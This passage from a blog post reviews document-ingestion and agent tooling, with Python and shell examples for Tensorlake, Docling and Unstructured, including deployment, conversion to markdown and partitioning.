&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents.tool&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function_tool&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;

&lt;span class="c1"&gt;# Container image with the dependencies the function needs
&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;base_image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_image&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;pip install openai openai-agents&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nd"&gt;@function_tool&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Gets the weather for a city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Weather Reporter&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Use web search to find current weather in the city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nc"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;()],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="nd"&gt;@application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tags&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;use_case&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Creates a simple city guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;city_guide_app&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Guide Creator&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Make a friendly city guide that includes the current temperature&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Paris&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Error: OPENAI_API_KEY is not set&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SystemExit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The code above creates a city guide application using OpenAI Agents with tool calls. I won't explain it line by line here, as the post would get unnecessarily long.&lt;/p&gt;

&lt;p&gt;You can find the explanation for this code in their &lt;a href="https://github.com/tensorlakeai/tensorlake#agentic-applications-quickstart" rel="noopener noreferrer"&gt;GitHub README&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deploying and running on Tensorlake Cloud
&lt;/h3&gt;

&lt;p&gt;To run the application on Tensorlake Cloud, it first needs to be deployed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;TENSORLAKE_API_KEY&lt;/code&gt; in your shell session:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;TENSORLAKE_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;OPENAI_API_KEY&lt;/code&gt; in your Tensorlake Secrets so that your application can make calls to OpenAI:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake secrets &lt;span class="nb"&gt;set &lt;/span&gt;OPENAI_API_KEY &lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Deploy the application to Tensorlake Cloud:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake deploy examples/readme_example/city_guide.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Run the remote test script found in &lt;code&gt;examples/readme_example/test_remote_app.py&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;run_remote_application&lt;/span&gt;

&lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;San Francisco&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Run the application remotely
&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_remote_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Request ID: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Get the output
&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The application will execute on Tensorlake Cloud, with each function running in its own isolated sandbox.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In short, Tensorlake takes care of spinning up containers, injecting secrets, and keeping functions durable so tool calls can be retried without you building your own queue system.&lt;/p&gt;
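&lt;p&gt;To make that concrete, here is a minimal sketch (with a hypothetical &lt;code&gt;flaky_tool_call&lt;/code&gt;) of the retry plumbing a durable runtime saves you from writing yourself:&lt;/p&gt;

```python
import time

def call_with_retries(fn, max_attempts=3, base_delay=0.1):
    """Retry fn with exponential backoff, re-raising after the last attempt."""
    for attempt in range(1, max_attempts + 1):
        try:
            return fn()
        except Exception:
            if attempt == max_attempts:
                raise
            time.sleep(base_delay * 2 ** (attempt - 1))

# Hypothetical flaky tool call: fails twice, then succeeds
attempts = {"count": 0}

def flaky_tool_call():
    attempts["count"] += 1
    if attempts["count"] < 3:
        raise RuntimeError("transient error")
    return "ok"

print(call_with_retries(flaky_tool_call))  # prints "ok" after two retries
```

This is only the happy-path version; a real system also needs persistence across process restarts, which is exactly the part the platform handles.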

&lt;p&gt;Here's a quick Tensorlake document ingestion demo showing it in action on a complex document. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/bjDfakRAGBk"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.docling.ai/" rel="noopener noreferrer"&gt;2. Docling&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" alt="Docling"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docling comes from the IBM Research Team, is MIT licensed (free, including for commercial use), and turns PDFs, Office docs, images, audio and more into a unified DoclingDocument format. You can then export that to markdown, HTML, DocTags or lossless JSON and plug it straight into RAG, agents or search.&lt;/p&gt;

&lt;p&gt;It runs locally and comes with strong layout and table understanding plus OCR and vision models for scanned or complex documents.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multi-format parsing&lt;/strong&gt; - PDF, DOCX, PPTX, XLSX, HTML, images, audio and more into one structured representation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Advanced PDF understanding&lt;/strong&gt; - Page layout, reading order, tables, code, formulas and images handled out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multiple export targets&lt;/strong&gt; - Export a single DoclingDocument to markdown, HTML, DocTags or structured JSON.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Local and privacy friendly&lt;/strong&gt; - Designed to run completely locally.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Gen AI integrations&lt;/strong&gt; - Hooks into LangChain, LlamaIndex, Haystack and others out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Convert and print markdown
&lt;/h3&gt;

&lt;p&gt;The basic flow is intentionally simple: create a converter, give it a source and then decide how you want to export the result.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;docling.document_converter&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentConverter&lt;/span&gt;

&lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://arxiv.org/pdf/2408.09869&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can also be a local Path(...)
&lt;/span&gt;&lt;span class="n"&gt;converter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentConverter&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;converter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;convert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;markdown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;export_to_markdown&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;markdown&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example shows the “one document in, one markdown document out” path you would usually slot into your indexing step.&lt;/p&gt;

&lt;p&gt;The result is a single markdown document you can split into chunks and feed into a vector database.&lt;/p&gt;
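&lt;p&gt;As a rough illustration (not part of Docling itself), splitting that markdown into overlapping chunks for a vector database can be as simple as this sketch:&lt;/p&gt;

```python
def chunk_markdown(text: str, size: int = 500, overlap: int = 50) -> list[str]:
    """Split text into fixed-size chunks with a small overlap
    so context is not cut off at chunk boundaries."""
    step = size - overlap
    return [text[i:i + size] for i in range(0, max(len(text) - overlap, 1), step)]

# Stand-in for the markdown Docling exported above
markdown = "# Title\n\n" + "Some paragraph text. " * 100
chunks = chunk_markdown(markdown)
print(len(chunks), len(chunks[0]))
```

Real pipelines usually split on headings or sentences instead of raw characters, but the overlap idea is the same.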

&lt;h3&gt;
  
  
  Code Example: Same idea from the CLI
&lt;/h3&gt;

&lt;p&gt;Docling also comes with a CLI. You can install it with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;docling
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, you can run it using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Convert a PDF at a URL to markdown on stdout&lt;/span&gt;
docling https://arxiv.org/pdf/2206.01062

&lt;span class="c"&gt;# Use the GraniteDocling vision language model in the pipeline&lt;/span&gt;
docling &lt;span class="nt"&gt;--pipeline&lt;/span&gt; vlm &lt;span class="nt"&gt;--vlm-model&lt;/span&gt; granite_docling https://arxiv.org/pdf/2206.01062
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There are, of course, more advanced use cases with many more flags you can add. For those, visit their &lt;a href="https://docling-project.github.io/docling/" rel="noopener noreferrer"&gt;documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's a quick video by Red Hat to see it in action. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/BWxdLm1KqTU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://unstructured.io/" rel="noopener noreferrer"&gt;3. Unstructured&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" alt="Unstructured"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Unstructured gives you an open source library plus a managed platform to turn unstructured content into structured data for LLM apps. It partitions PDFs, slides, HTML, Office files and images into a standard set of elements that downstream tools can easily consume.&lt;/p&gt;

&lt;p&gt;On top of that, the ingest layer adds connectors, chunking and embeddings so you can build full ETL style pipelines around your document sources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One partition API&lt;/strong&gt; - Autodetects the file type and routes it to the right parser for you.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM friendly outputs&lt;/strong&gt; - Structured elements with text, metadata and coordinates when needed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Source and destination connectors&lt;/strong&gt; - GitHub, S3 and more via the Ingest CLI and Python library.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hosted Partition Endpoint&lt;/strong&gt; - Offloads compute to their API when you want better models or scale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" alt="Unstructured - Designed to scale"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Quickstart with &lt;code&gt;partition&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This is the core pattern you will see in most examples, and it is enough to plug into a RAG pipeline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;unstructured.partition.auto&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;partition&lt;/span&gt;

&lt;span class="c1"&gt;# Read and partition a document
&lt;/span&gt;&lt;span class="n"&gt;elements&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;partition&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example-docs/layout-parser-paper.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

